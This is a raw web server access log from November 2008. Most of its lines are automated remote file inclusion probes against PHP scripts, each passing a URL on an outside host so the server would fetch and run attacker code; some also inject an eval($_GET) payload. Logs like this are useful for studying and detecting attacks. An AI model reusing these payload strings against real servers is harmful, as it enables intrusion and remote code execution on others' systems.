200.68.51.126 - - [04/Nov/2008:08:21:43 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.126 - - [04/Nov/2008:08:21:43 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 200 94814 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:21:47 -0800] "GET /logs/access_080702.log//phpSecurePages/secure.php?&cfgProgDir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:22:06 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.246.52.41 - - [04/Nov/2008:08:22:06 -0800] "GET /logs/access_071129.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:22:06 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 200 94663 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:22:07 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:22:21 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:22:24 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:22:27 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:22:29 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:22:37 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:22:50 -0800] "GET /logs/access_081001.log//tools/send_reminders.php?includedir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:22:50 -0800] "GET /tools/send_reminders.php?includedir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:22:50 -0800] "GET /logs//tools/send_reminders.php?includedir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:22:56 -0800] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:22:56 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:22:56 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:23:03 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:08:23:08 -0800] "GET /bikes/dteel/2008_01_27/?N=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.39 - - [04/Nov/2008:08:23:29 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [04/Nov/2008:08:23:30 -0800] "GET /megumi/minamigrad2k8/IMG_1678.CR2 HTTP/1.1" 200 786432 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:23:32 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:23:32 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:23:33 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:23:34 -0800] "GET /logs/access_080912.log/index.php?a=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:23:34 -0800] "GET /logs/index.php?a=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:23:34 -0800] "GET /index.php?a=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 94833 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:23:44 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:23:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:23:48 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:23:48 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:24:01 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:24:01 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:24:01 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:30 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:31 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:08:24:33 -0800] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC HTTP/1.1" 200 32877 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:34 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:08:24:38 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:08:24:39 -0800] "GET /index.php?DOCUMENT_ROOT=http://208.57.132.68/renovt.txt? HTTP/1.1" 200 94644 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:08:24:39 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:40 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:40 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:24:40 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:08:25:11 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:25:28 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:25:28 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:26:07 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:26:07 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:26:14 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:26:20 -0800] "GET /logs/access_080906.log//tools/send_reminders.php?includedir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:26:21 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:08:27:01 -0800] "GET /logs/impex/ImpExData.php?systempath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:08:27:02 -0800] "GET /impex/ImpExData.php?systempath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.63.65.43 - - [04/Nov/2008:08:28:26 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.63.65.43 - - [04/Nov/2008:08:28:26 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.63.65.43 - - [04/Nov/2008:08:28:26 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.63.65.43 - - [04/Nov/2008:08:28:26 -0800] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
59.106.19.213 - - [04/Nov/2008:08:28:33 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [04/Nov/2008:08:28:33 -0800] "GET /logs/access_080826.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [04/Nov/2008:08:28:33 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [04/Nov/2008:08:28:33 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:28:54 -0800] "GET /impex/ImpExData.php?systempath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:28:54 -0800] "GET /logs/impex/ImpExData.php?systempath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:29:00 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:29:00 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:29:01 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:29:12 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:29:13 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.kuiwa.at/id.txt?? HTTP/1.1" 200 94630 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:29:14 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.25 - - [04/Nov/2008:08:29:30 -0800] "GET /?show=gallery&pageid=172&nggpage=17 HTTP/1.1" 200 159943 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:30:00 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:30:16 -0800] "GET /logs/access_081018.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:30:16 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:30:16 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:30:16 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:08:30:46 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:08:30:46 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:30:49 -0800] "GET /logs/access_080811.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:30:49 -0800] "GET /logs/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:30:49 -0800] "GET /errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:30:50 -0800] "GET /logs/access_080811.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:30:50 -0800] "GET /errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:30:50 -0800] "GET /logs/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:31:00 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:31:00 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:31:00 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:31:00 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:08:31:14 -0800] "GET /logs/access_080505.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:08:31:15 -0800] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:08:31:15 -0800] "GET /logs/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:31:25 -0800] "GET /impex/ImpExData.php?systempath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:31:25 -0800] "GET /logs/impex/ImpExData.php?systempath=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:31:36 -0800] "GET /logs/access_080817.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:08:31:45 -0800] "GET /logs/access_080817.log/errors.php?error=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:32:04 -0800] "GET /phphtml.php?htmlclass_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:32:14 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:32:17 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:32:18 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:32:18 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:32:20 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:32:28 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:32:42 -0800] "GET /logs/galleria.html.php?mosConfig_absolute_path=http://beschriftungsworld.de/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:32:46 -0800] "GET /logs/access_080725.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:32:47 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:32:47 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:32:55 -0800] "GET /logs/access_080429.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:32:57 -0800] "GET /logs/access_080429.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:32:58 -0800] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
